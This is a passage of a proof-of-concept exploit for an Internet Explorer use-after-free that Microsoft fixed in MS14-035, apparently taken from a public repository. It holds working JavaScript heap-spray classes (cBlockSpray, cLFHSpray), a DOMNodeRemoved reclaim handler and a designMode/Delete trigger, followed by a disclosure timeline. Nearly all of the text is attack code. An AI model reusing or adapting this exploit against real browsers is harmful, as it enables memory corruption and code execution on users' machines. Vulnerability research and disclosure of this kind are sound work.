[0x08, 0x40],
[0x08, 0x20],
[0x10, 0x80]
];
var u­Base­Address = 0x12340000;
var ao­Block­Sprays = new Array(aau­Copies­And­Sizes.length);
for (var i = 0; i < aau­Copies­And­Sizes.length; i++) {
ao­Block­Sprays[i] = new c­Block­Spray(aau­Copies­And­Sizes[i][0], aau­Copies­And­Sizes[i][1]);
ao­Block­Sprays[i].set­Chunk­DWord(0x0100, u­Base­Address + 0x0300);
ao­Block­Sprays[i].spray();
}
document.add­Event­Listener("DOMNode­Removed", function () {
document.open();
var o­LFHReuse = new c­LFHSpray(10, 0x28);
o­LFHReuse.set­DWord(0x10, u­Base­Address + 0x0100);
o­LFHReuse.set­DWord(0x14, u­Base­Address + 0x0200);
o­LFHReuse.spray();
}, true);
window.onload = function () {
document.design­Mode="on";
document.exec­Command("Select­All");
document.exec­Command("Delete");
document.design­Mode="off";
};
</script>
</head>
<body>
</body>
</html>
<!--
########################################################################
c­LFHSpray.js:
function c­LFHSpray(u­Count, u­Size) {
this.ao­Elements = new Array(u­Count);
var au­Spray­Chars = new Array(u­Size - 1 >> 1);
for (var i = 0; i < au­Spray­Chars.length; i++) {
au­Spray­Chars[i] = ((i & 0x­FF) * 0x202 + 0x100) & 0x­FFFF;
}
this.set­DWord = function(u­Offset, u­Value) {
this.set­Word(u­Offset, u­Value & 0x­FFFF);
this.set­Word(u­Offset + 2, u­Value >>> 16);
}
this.set­Word = function(u­Offset, u­Value) {
this.set­Byte(u­Offset, u­Value & 0x­FF);
this.set­Byte(u­Offset + 1, u­Value >>> 8);
}
this.set­Byte = function(u­Offset, u­Value) {
var u­Char­Offset = u­Offset >> 1;
var u­Byte0 = (u­Offset & 1 ? au­Spray­Chars[u­Char­Offset] : u­Value) & 0x­FF;
var u­Byte1 = (u­Offset & 1 ? u­Value : (au­Spray­Chars[u­Char­Offset] >> 8)) & 0x­FF;
au­Spray­Chars[u­Char­Offset] = u­Byte0 + (u­Byte1 << 8);
}
this.spray = function() {
var s­Spray­Buffer = String.from­Char­Code.apply(0, au­Spray­Chars);
for (var i = 0; i < u­Count; i++) {
this.ao­Elements[i] = document.create­Element("span"); // allocate 0x34 bytes
this.ao­Elements[i].class­Name = s­Spray­Buffer; // allocate 0x10, u­Size and 0x40 bytes.
}
}
}
########################################################################
c­Block­Spray.js:
var c­Block­Spray = (function() {
var u­Chunk­Size = 0x10000;
var u­Block­Header­Size = 0x10;
var u­Block­Footer­Size = 0x04;
var as­Chunk­Template = new Array(u­Chunk­Size / 2);
for (var u­Index = 0; u­Index < as­Chunk­Template.length; u­Index += 2) {
as­Chunk­Template[u­Index] = String.from­Char­Code(u­Index);
as­Chunk­Template[u­Index + 1] = String.from­Char­Code(0x­DEAD);
}
return function c­Block­Spray(u­Block­Count, u­Chunk­Count) {
this.u­Block­Size = u­Chunk­Count * u­Chunk­Size - u­Block­Header­Size - u­Block­Footer­Size;
var s­Chunk = as­Chunk­Template.join("");
var s­Block, as­Blocks = new Array(u­Block­Count);
this.set­Chunk­DWord = function (u­Offset, u­Value) {
this.set­Chunk­Word(u­Offset, u­Value & 0x­FFFF);
this.set­Chunk­Word(u­Offset + 2, (u­Value >> 16) & 0x­FFFF);
}
this.set­Chunk­Word = function (u­Offset, u­Value) {
if (s­Block) throw new Error("Cannot set chunk values after generating block");
if (u­Offset & 1) throw new Error("u­Offset (" + u­Offset.to­String(16) + ") must be Word aligned");
if (u­Offset >= u­Chunk­Size) throw new Error("u­Offset (" + u­Offset.to­String(16) + ") must be smaller than 0x" + u­Chunk­Size.to­String(16));
var u­Index = u­Offset / 2;
var s­Value = String.from­Char­Code(u­Value & 0x­FFFF);
s­Chunk = s­Chunk.substr(0, u­Index) + s­Value + s­Chunk.substr(u­Index + 1);
}
this.generate­Block = function () {
if (s­Block) throw new Error("Cannot generating block twice");
s­Block = (
s­Chunk.substr(u­Block­Header­Size / 2) +
new Array(u­Chunk­Count - 1).join(s­Chunk) +
s­Chunk.substr(0, (u­Chunk­Size - u­Block­Footer­Size) / 2)
);
}
this.set­Block­DWord = function (u­Offset, u­Value) {
this.set­Block­Word(u­Offset, u­Value & 0x­FFFF);
this.set­Block­Word(u­Offset + 2, (u­Value >> 16) & 0x­FFFF);
}
this.set­Block­Word = function (u­Offset, u­Value) {
if (!s­Block) this.generate­Block();
if (u­Offset & 1) throw new Error("u­Offset (" + u­Offset.to­String(16) + ") must be Word aligned");
var u­Index = (u­Offset - u­Block­Header­Size) / 2;
if (u­Index < 0) throw new Error("u­Offset (" + u­Offset.to­String(16) + ") must be larger than 0x" + u­Block­Header­Size.to­String(16));
if (u­Index >= s­Block.length) throw new Error("u­Offset (" + u­Offset.to­String(16) + ") must be smaller than 0x" + (u­Block­Header­Size + s­Block.length * 2).to­String(16));
var s­Value = String.from­Char­Code(u­Value & 0x­FFFF);
s­Block = s­Block.substr(0, u­Index) + s­Value + s­Block.substr(u­Index + 1);
}
this.spray = function() {
if (!s­Block) this.generate­Block();
for (var i = 0; i < u­Block­Count; i++) {
as­Blocks[i] = ("" + s­Block).slice(0);
}
}
}
})();
Time-line
30 December 2013: This vulnerability was submitted to ZDI.
8 January 2014: This vulnerability was acquired by ZDI.
14 January 2014: This vulnerability was disclosed to Microsoft by ZDI.
10 June 2014: This vulnerability was address by Microsoft in MS14-035.
20 December 2016: Details of this vulnerability are released.
-->
Reference in a new issue View git blame Copy permalink